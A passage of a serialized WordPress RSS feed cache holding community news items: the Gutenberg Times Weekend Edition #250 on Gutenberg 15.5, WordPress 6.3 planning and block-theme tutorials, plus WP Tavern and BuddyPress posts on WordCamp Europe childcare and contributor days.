#250\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://gutenbergtimes.com/?p=23854\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:131:\"https://gutenbergtimes.com/all-women-release-squad-for-6-4-grid-layout-pattern-for-front-page-designs-and-more-weekend-edition-250/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:18807:\"<p>Howdy, </p>\n\n\n\n<p>250 newsletter editions. WOW. It feels like a nice round number and worth a celebration. The weekend edition of the Gutenberg Times officially became a newsletter, sent via Mailchimp, on Feb. 3rd, 2018 with 12 subscribers. It has much evolved since then. </p>\n\n\n\n<p>It&#8217;s been a stable of my life to connect with you weekly and report on Gutenberg. After all these years (<a href=\"https://open.spotify.com/track/6XqvRGDs5eLQSCyKUBCBGF?si=e4df7a8278b04efa\">cue in Paul Simon</a>&#8216;s Still Crazy),  I am still infinitely curious about what people create with the block editor. Thank you for your great support and trust. It&#8217;s been a great privilege.  </p>\n\n\n\n<p><a href=\"https://europe.wordcamp.org/2023/\"><strong>WordCamp Europe</strong></a> is around the corner, and if possible, I would meet as may subscribers as possible there. <a href=\"https://calendly.com/pauli-haack/wordcamp-europe?month=2023-06\">My public calendar is open.</a> This method worked very well to meet and I met an incredible mix of people at WordCamp Asia this way.  Making a deliberate effort and scheduling an appointment, adds certainty to an otherwise chance encounter  in the Hallway track. I will be in town before the WordCamp, so the calendar is also open for the 7th of June, if that fits your schedule better, too.</p>\n\n\n\n<p>I also hope to see you at the <a href=\"https://europe.wordcamp.org/2023/contributor-day/\">Contributor Day</a> on 8th of June.  <a href=\"https://europe.wordcamp.org/2023/contributor-day/#register\">Registration is open</a> for those who already have a WordCamp Europe ticket.  The organizer team of WCEU also announced that <a href=\"https://wptavern.com/wceu-2023-announces-free-childcare-and-workshop-for-kids\">there will be free child care are and a Kids track.</a></p>\n\n\n\n<p>As a side note, we signed the lease for our Munich flat and my husband and I will have a new permanent address starting May 1, 2023. </p>\n\n\n\n<p>I hope you have a fabulous weekend! </p>\n\n\n\n<p>Yours, 💕<br /><em>Birgit</em></p>\n\n\n\n\n<div class=\"wp-block-group has-light-background-background-color has-background is-layout-flow wp-block-group-is-layout-flow\"><div class=\"wp-block-group__inner-container\">\n<p><strong>Table of Contents</strong></p>\n\n\n\n<div class=\"wp-block-sortabrilliant-guidepost\"><ul><li><a href=\"https://gutenbergtimes.com/feed/#0-word-press-release-information\">Developing Gutenberg and WordPress</a></li><li><a href=\"https://gutenbergtimes.com/feed/#0-p\">Plugins, Themes, and Tools for #nocode site builders and owners</a></li><li><a href=\"https://gutenbergtimes.com/feed/#2-word-press-6-0-1-and-6-1-scheduled\">Theme Development for Full Site Editing and Blocks</a></li><li><a href=\"https://gutenbergtimes.com/feed/#3-building-themes-for-fse-and-word-press\">Building Blocks and Tools for the Block editor. </a></li></ul></div>\n</div></div>\n\n\n\n\n<h2 class=\"wp-block-heading\" id=\"0-word-press-release-information\">Developing Gutenberg and WordPress</h2>\n\n\n\n<p><strong>Gutenberg 15.5</strong> was released last week, and it was a great pleasure for me to discuss it all with <a href=\"https://gutenbergtimes.com/podcast/gutenberg-changelog-81-wordpress-6-2-interactivity-api/\">Leonardus Nugraha for the Gutenberg Changelog podcast. </a></p>\n\n\n\n<div class=\"wp-block-group has-light-background-background-color has-background is-layout-flow wp-block-group-is-layout-flow\"><div class=\"wp-block-group__inner-container\">\n<p><strong>🎙️ </strong> New episode:  <a href=\"https://gutenbergtimes.com/podcast/gutenberg-changelog-81-wordpress-6-2-interactivity-api/\">Gutenberg Changelog #81 – WordPress 6.2, Gutenberg 15.4 and 15.5, Phase 3 – Collaboration and a new  Interactivity API</a> with Birgit Pauli-Haack and special guest Leonardus Nugraha</p>\n</div></div>\n\n\n\n<p><strong>Hector Prieto </strong>proposed the <a href=\"https://make.wordpress.org/core/2023/04/14/wordpress-6-3-planning-proposal-call-for-volunteers/\"><strong>release schedule for WordPress 6.3 and opened the call for volunteers</strong></a> for the release squad. </p>\n\n\n\n<p>It comes on the heals of <strong>Josepha Haden Chomphosy</strong>&#8216;s invitation to the all-women release squad for 6.4. <a href=\"https://make.wordpress.org/core/2023/04/07/preparing-for-the-next-women-nonbinary-release-squad/\"><strong>Preparing for the Next Women &amp; Nonbinary Release Squad</strong></a>. Raise your hands in the comments if you want to get involved in the WordPress major release process. </p>\n\n\n\n<p><strong>Sarah Gooding</strong> reported on the release for the WP Tavern. Read <a href=\"https://wptavern.com/gutenberg-15-5-introduces-experimental-grid-layout-support\"><strong>Gutenberg 15.5 Introduces Experimental Grid Layout Support</strong></a>.</p>\n\n\n\n<p>With all the releases last week,  you might have missed the current call for testing from the FSE Outreach Program by <strong>Anne McCarthy</strong>: <strong><a href=\"https://make.wordpress.org/test/2023/03/29/fse-program-exploration-build-a-block-theme/\">FSE Program Exploration: Build a block theme</a>.</strong> She wrote: &#8220;If you’ve never built a block theme, consider this an invitation to give it a try. Tooling has come a long way and the power of what’s being built is that it allows more folks to dive into the future (and present) of WordPress.<strong>&nbsp;</strong>For this experience, you’ll use the <a href=\"https://wordpress.org/plugins/create-block-theme/\"><em>Create Block Theme&nbsp;plugin&nbsp;</em></a>to facilitate the creation and export process, so you can keep what you create!&#8221; To leave your feedback and share your observations, use the comment section of the post. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Justin Tadlock</strong> published the <a href=\"https://developer.wordpress.org/news/2023/04/whats-new-for-developers-april-2023/\"><strong>What&#8217;s new for Developer April 2023</strong></a> round-up post on the WordPress Developer Blog. With byte-sized news, Tadlock invites you to dive deeper into certain topics, or let you know about new features and updated APIs. The post is for plugin and theme developers alike. It might be worth bookmarking each of the post, so you can quickly skim editions, when looking for a specific feature or update. </p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"0-p\">Plugins, Themes, and Tools for #nocode site builders and owners</h2>\n\n\n\n<p>With this recording on WordPressTV, let <strong>Kathryn Presner</strong> and <strong>Wes Theron</strong> take you on a tour  <a href=\"https://wordpress.tv/2023/04/12/exploring-some-of-the-new-6-2-wordpress-features/\"><strong>exploring some of the new 6.2 WordPress features</strong></a>. The guide for the exploration is the release post of <a href=\"https://wordpress.org/news/2023/03/dolphy/\">WordPress &#8220;Dolphy&#8221; 6.2</a>. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>In another video on WordPressTV, <strong>Wes Theron</strong> shows you <a href=\"https://wordpress.tv/2023/04/10/adding-a-sticky-header-or-banner/\"><strong>how to add a sticky header or banner</strong></a> with the new 6.2 sticky feature. The new sticky option is available when wrapping a header or banner in a Group block. It ensures the block remains within the viewport and is stuck to the top of the page when the content is scrolled.</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Sarah Gooding</strong> reported on the new WooCommerce release: <a href=\"https://wptavern.com/woocommerce-7-6-introduces-single-product-details-block-and-add-to-cart-form-block\"><strong>WooCommerce 7.6 Introduces Single Product Details Block and “Add to Cart” Form Block</strong></a>. &#8220;Along with the button, the “Add to Cart” form block will automatically display additional options, depending on if the product has a set available quantity or variations.” she wrote. Together with the Single Product Details block, store owners can now assemble their unique Single product template together with the block themes. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong><a href=\"https://twitter.com/raemoreywrites\">Rae Morey</a></strong>, editor of The Repository, wrote in the <a href=\"https://www.therepository.email/?mailpoet_router&endpoint=view_in_browser&action=view&data=WzE5NCwiM2EzYmU1NDdjYmVhIiw1NTYsIjFqb2g0ZGtiNnZmbzh3NG9vb3dnNG9zODhnazA0czR3Iiw1NjIsMF0\">latest edition of the newsletter (#165) </a>: &#8220;The team behind <strong>Multicollab</strong>, a tool that enables <strong>Google Docs-style collaboration in WordPress</strong>, are working on a prototype for real-time collaboration. It&#8217;s still in beta, but the team is inviting folks to preview it in action.&#8221; <a href=\"https://www.youtube.com/watch?v=BH63x-hYgk4\">The video explains how the feature works in the demo</a>. Once you leave your email address, on <a href=\"https://www.therepository.email/?mailpoet_router&endpoint=track&action=click&data=WyI1NTYiLCIxam9oNGRrYjZ2Zm84dzRvb293ZzRvczg4Z2swNHM0dyIsIjU2MiIsIjllY2U5MWMzMjJiZCIsZmFsc2Vd\">the beta sign-up you are invited to the demo</a>. </p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"2-word-press-6-0-1-and-6-1-scheduled\">Theme Development for Full Site Editing and Blocks</h2>\n\n\n\n<p><strong><a href=\"https://twitter.com/justintadlock\">Justin Tadlock</a></strong> unlocks for you how to use <a href=\"https://developer.wordpress.org/news/2023/04/using-template-patterns-to-build-multiple-homepage-designs/\"><strong>template patterns to build multiple homepage designs</strong></a>. Tadlock <a href=\"https://twitter.com/justintadlock/status/1646575433331212301\">tweeted</a>: &#8220;I&#8217;m a block pattern fanatic. So, when Gutenberg 15.5 released with UI integration of &#8220;template type&#8221; patterns, I couldn&#8217;t wait to dive in.&#8221; This tutorial focuses on creating multiple front-page designs that your users can choose from. Specifically, you will learn to build patterns that are tied to the&nbsp;<strong>Front Page</strong>&nbsp;template in WordPress.&#8221;</p>\n\n\n\n\n<p><strong>&nbsp;<a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/\" target=\"_blank\" rel=\"noreferrer noopener\">&#8220;Keeping up with Gutenberg &#8211; Index 2022&#8221;</a>&nbsp;</strong><br />A chronological list of the WordPress Make Blog posts from various teams involved in Gutenberg development: Design, Theme Review Team, Core Editor, Core JS, Core CSS, Test and Meta team from Jan. 2021 on. Updated by yours truly.  <a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/keeping-up-with-gutenberg-index-2020/\"><em>The index 2020 is here</em></a></p>\n\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Brian Gardner</strong> explained <a href=\"https://wpengine.com/builders/base-wordpress-theme/\"><strong>How (and Why) to Build a Base WordPress Theme</strong></a>, in taking you behind-the-scenes of an agency that forked a WordPress theme to create a tailored version that caters to client needs. &#8220;Here’s an example of how building a boilerplate can help an agency thrive.&#8221; Gardner wrote </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>The WordPress themes team requests your input on the <a href=\"https://make.wordpress.org/themes/2023/04/04/theme-handbook-overhaul-proposal/\"><strong>proposal for a revamp of the Themes Handbook</strong></a>. In his post, Justin Tadlock wrote: &#8220;The problem with handbooks for ever-changing software is that they need a large re-tuning from time to time. The Theme Handbook has reached that point in its lifespan.&#8221; There will also be a dedicated meeting on April 18, 2023 at 13:00 UTC via the&nbsp;<a href=\"https://wordpress.slack.com/archives/C02RP4Y3K\">#themereview</a>&nbsp;channel on&nbsp;Slack. Everyone is welcome to join and discuss this proposal in detail.</p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"3-building-themes-for-fse-and-word-press\">Building Blocks and Tools for the Block editor. </h2>\n\n\n\n<p>A reminder: The team who put together the <a href=\"https://make.wordpress.org/core/2023/03/30/proposal-the-interactivity-api-a-better-developer-experience-in-building-interactive-blocks/\"><strong>Proposal for the Interactivity API</strong></a> will hold two <strong>Developer Hours on April 17th</strong>, 2023 one <a href=\"https://www.meetup.com/learn-wordpress-online-workshops/events/292575913/\">at 8 am UTC</a> and one <a href=\"https://www.meetup.com/learn-wordpress-online-workshops/events/292575942/\">at 17:00 UTC</a> to cover as many timezones as possible. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Ryan Welcher</strong> posted the recording of his Twitch stream session from March 30, 2023: <a href=\"https://www.youtube.com/watch?v=n2SYJhh3PGs\"><strong>Reviewing Gutenberg 15.4 Features | Bring Me Your Issues #2</strong></a>. In this session, Ryan took a look at  at some features released in Gutenberg 15.4. He continued working through viewer-submitted issues by continuing with the post-picker block from the <a href=\"https://www.youtube.com/watch?v=Aut0EcsKbxM\">first of the &#8220;Bring me Your Issues</a>&#8221; session. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>In his post, <a href=\"https://humanmade.com/2023/04/06/wordpress-ai-generative-content-and-blocks/\"><strong>WordPress AI: Generative Content &amp; Blocks</strong></a>, <strong><a href=\"https://twitter.com/joe_hoyle\">Joe Hoyle</a></strong> shared the initial results from his team&#8217;s the experiments  on integrating generative AI into WordPress. They worked on a &#8220;WordPress CoPilot&#8221; that can &#8220;speak&#8221; Gutenberg/block editor. The video gives you a glimpse into the power of the tools and how they can speed up content creation. &#8220;Going through this project has convinced me that LLMs have much more potential than I was giving them credit for. It feels like there’s still a lot to discover what the models are capable of.&#8221; Hoyle <a href=\"https://twitter.com/joe_hoyle/status/1643952952690835456\">tweeted</a>. Joe Hoyle is co-founder the Chief Technical officer at Human Made</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>Inspired by Joy Hoyle&#8217;s post, Sarah Gooding, <a href=\"https://wptavern.com/wordpress-developers-are-experimenting-with-gutenberg-native-ai-block-and-content-assistants\"><strong>WordPress Developers Are Experimenting With Gutenberg-Native AI Block and Content Assistants</strong></a>. She also included Munir Kamal&#8217;s venture into tools powered by AI. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Fabian Kägy,</strong> lead developer at 10up, was a guest on the <a href=\"https://syntax.fm/show/598/supper-club-fabian-kaegy-modern-wordpress-blocks-page-builders-headless-custom-fields\"><strong>Supper Club episode of the Syntax podcast</strong></a> and co-hosts Wes Bos and Scott Tolinsky discussed with him,  modern WordPress development, local dev experience, changes to the block editor, how version control is handled, and more!</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Munir Kamal</strong> posted a <a href=\"https://gutenberghub.com/how-to-add-block-styles-in-wordpress-a-step-by-step-guide/\"><strong>How to Add Block Styles in WordPress – A Step-by-Step Guide</strong></a>. Why build a new block when you can change the appearance of a core block by adding block styles. With little PHP code and accompanying CSS a new design is applied. No JavaScript required. Kamal also shows you how to find out the name of the block you&#8217;d like to target with the new styles. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Brian Coords</strong> and <strong>Aurooba Ahmed</strong> discuss on this episode of the <a href=\"https://viewsource.fm/\">ViewSource </a>podcast: <a href=\"https://www.youtube.com/watch?v=TtmY2Ck_6i0\"><strong>Getting started with React inside WordPress</strong></a> You learn what React is  and how it works with WordPress. It&#8217;s the start of a series of episodes to build an accordion block for the WordPress block editor.  </p>\n\n\n\n\n<p><strong><a href=\"https://gutenbergtimes.com/need-a-zip-from-master/\">Need a plugin .zip from Gutenberg&#8217;s master branch?</a></strong><br />Gutenberg Times provides daily build for testing and review. <br />Have you been using it? Hit reply and let me know.</p>\n\n\n\n<p><img alt=\"GitHub all releases\" src=\"https://img.shields.io/github/downloads/bph/gutenberg/total?style=for-the-badge\" /></p>\n\n\n\n\n<p class=\"has-text-align-right has-small-font-size\"><em>Questions? Suggestions? Ideas? Don&#8217;t hesitate to send <a href=\"mailto:pauli@gutenbergtimes.com\">them via email</a> or send me a message on WordPress Slack or Twitter @bph</em>. </p>\n\n\n\n<p class=\"has-text-align-right has-small-font-size\">For questions to be answered on the <a href=\"http://gutenbergtimes.com/podcast\">Gutenberg Changelog</a>, send them to <a href=\"mailto:changelog@gutenbergtimes.com\">changelog@gutenbergtimes.com</a></p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n\n<p>Featured Image: <a href=\"https://www.flickr.com/photos/34575850@N05/46876447485\">Moveable Type by L. M. Bernhardt </a></p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity is-style-wide\" />\n\n\n\n<p class=\"has-text-align-left\"><strong>Don&#8217;t want to miss the next Weekend Edition? </strong></p>\n\n\n\n<form class=\"wp-block-newsletterglue-form ngl-form ngl-portrait\" action=\"https://gutenbergtimes.com/feed/\" method=\"post\"><div class=\"ngl-form-container\"><div class=\"ngl-form-field\"><label class=\"ngl-form-label\" for=\"ngl_email\"><br />Type in your Email address to subscribe.</label><div class=\"ngl-form-input\"><input type=\"email\" class=\"ngl-form-input-text\" name=\"ngl_email\" id=\"ngl_email\" /></div></div><button type=\"submit\" class=\"ngl-form-button\">Subscribe</button><p class=\"ngl-form-text\">We hate spam, too and won&#8217;t give your email address to anyone except Mailchimp to send out our Weekend Edition</p></div><div class=\"ngl-message-overlay\"><div class=\"ngl-message-svg-wrap\"></div><div class=\"ngl-message-overlay-text\">Thanks for subscribing.</div></div><input type=\"hidden\" name=\"ngl_list_id\" id=\"ngl_list_id\" value=\"26f81bd8ae\" /><input type=\"hidden\" name=\"ngl_double_optin\" id=\"ngl_double_optin\" value=\"yes\" /></form>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity is-style-wide\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 15 Apr 2023 05:57:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Birgit Pauli-Haack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"WPTavern: WCEU 2023 Announces Free Childcare and Workshop for Kids\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=143574\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"https://wptavern.com/wceu-2023-announces-free-childcare-and-workshop-for-kids\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1966:\"<p>Preparations for WordCamp Europe (WCEU) 2023 in Athens are moving forward as the team <a href=\"https://twitter.com/WCEurope/status/1644304356236312577\">will soon be contacting speakers</a> selected for the event. Organizers have launched a <a href=\"https://europe.wordcamp.org/2023/speaker-support-program/\">Speaker Support Program</a> aimed at encouraging more diversity on stage by connecting speakers with companies that are willing to financially support them.</p>\n\n\n\n<p>WCEU has also opened <a href=\"https://europe.wordcamp.org/2023/contributor-day/\">registration for Contributor Day</a>, which will take place on June 8, kicking off the event. Those who are unable attend in person can join in the #contributor-day channel on Slack as well as the specific channels for the contributor teams.</p>\n\n\n\n<p>Alongside Contributor Day, WCEU has announced it will be hosting an interactive <a href=\"https://europe.wordcamp.org/2023/workshop-for-kids/\">Workshop for Kids</a> on June 8, to introduce future generations to WordPress. It will cover the basics of WordPress, how to create a website, choose a theme, and publish content. The workshop is open to kids aged 13-16 and all materials will be provided.</p>\n\n\n\n<p>WCEU will also have free childcare available during the Contributor Day and the main conference from June 8-10, to make the WordCamp more accessible for parents and guardians. Children aged 16 and younger are eligible to attend but must <a href=\"https://europe.wordcamp.org/2023/childcare-registration/\">register by May 20</a>, as there is limited availability for childcare.</p>\n\n\n\n<p>The <a href=\"https://europe.wordcamp.org/2023/call-for-volunteers/\">call for volunteers</a> is still open with a variety of roles available. Volunteers will receive one or two collectable volunteer t-shirt(s), a free ticket, and an invite to the Social, as well as the experience of contributing back to the WordPress community at one of its largest events.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Apr 2023 22:25:55 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"WPTavern: BuddyPress to Host Virtual Contributor Day on April 20\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=143652\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"https://wptavern.com/buddypress-to-host-virtual-contributor-day-on-april-20\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2644:\"<p>Representatives of the BuddyPress core team will be <a href=\"https://buddypress.org/2023/04/lets-meet-in-paris-during-the-french-community-contributor-day/\">hosting a contributor day</a> alongside the French WordPress Community Contributor Day in Paris on April 20, 2023. This in-person event has filled up its registration and <a href=\"https://wpfr-net.translate.goog/programme-de-la-journee-de-contribution-organisee-a-paris-le-20-04-2023/?_x_tr_sl=fr&_x_tr_tl=en&_x_tr_hl=fr&_x_tr_pto=wapp\">posted its schedule</a> already, but BuddyPress core developer Mathieu Viet is inviting people to join online to contribute to BuddyPress.</p>\n\n\n\n<p>&#8220;As we’re currently working on a very ambitious 12.0 release with the main goal of migrating from our Legacy URL parser to using the WordPress Rewrite API, there are many areas getting your contributions would really help us and make a huge difference,&#8221; Viet said.</p>\n\n\n\n<p><a href=\"https://wptavern.com/buddypress-12-0-to-focus-on-merging-bp-rewrites-into-core-moving-legacy-widgets-into-bp-classic-plugin\">BuddyPress 12.0</a> is expected to be released May 31, 2023, and merging the BP Rewrites feature plugin into the core plugin will be a major change that impacts the entire BuddyPress ecosystem. The effort to migrate BuddyPress’ custom URI parser to use WordPress’ Rewrite API has been in the works for the past decade. Contributors will also be providing backwards compatibility via a new plugin called <a href=\"https://github.com/buddypress/bp-classic\">BP Classic</a> that will contain BuddyPress’ legacy widgets. The virtual contributor day will organize code contributions towards these efforts.</p>\n\n\n\n<p>In addition to code, people can also contribute to documentation regarding how developers can prepare their themes and plugins to be ready for BP Rewrites, and documentation for end users on how the change will benefit their BuddyPress experience. Viet also intends to organize some common troubleshooting tips for the inevitable support forum requests that the major change will generate.</p>\n\n\n\n<p>The event will run from <a rel=\"noreferrer noopener\" href=\"https://www.timeanddate.com/worldclock/fixedtime.html?iso=20230420T0815\" target=\"_blank\">08:15 UTC</a> to <a rel=\"noreferrer noopener\" href=\"https://www.timeanddate.com/worldclock/fixedtime.html?iso=20230420T1530\" target=\"_blank\">15:30 UTC</a>. Although virtual attendees may miss out on the hot drinks and pastries, they can be equal participants by joining <a href=\"https://wordpress.slack.com/messages/buddypress\">BuddyPress&#8217; Slack channel</a> and jumping in on one of the projects.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Apr 2023 20:09:40 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"Do The Woo Community: The Evolution of the Friday Show\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"https://dothewoo.io/?p=74773\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"https://dothewoo.io/friday-show-evolution/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:307:\"<p>It\'s time to come on our Friday show as a guest co-host.</p>\n<p>&gt;&gt; The post <a rel=\"nofollow\" href=\"https://dothewoo.io/friday-show-evolution/\">The Evolution of the Friday Show</a> appeared first on <a rel=\"nofollow\" href=\"https://dothewoo.io\">Do the Woo - a WooCommerce Builder Community</a>	.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Apr 2023 10:14:06 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"BuddyPress: Let’s meet in Paris during the french community contributor day\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://buddypress.org/?p=329085\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:94:\"https://buddypress.org/2023/04/lets-meet-in-paris-during-the-french-community-contributor-day/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3548:\"<p>The BuddyPress Core Team is very happy to be represented at the Contributor Day the french WordPress community is organizing in Paris on April 20, 2023. Here&#8217;s a link to a <a 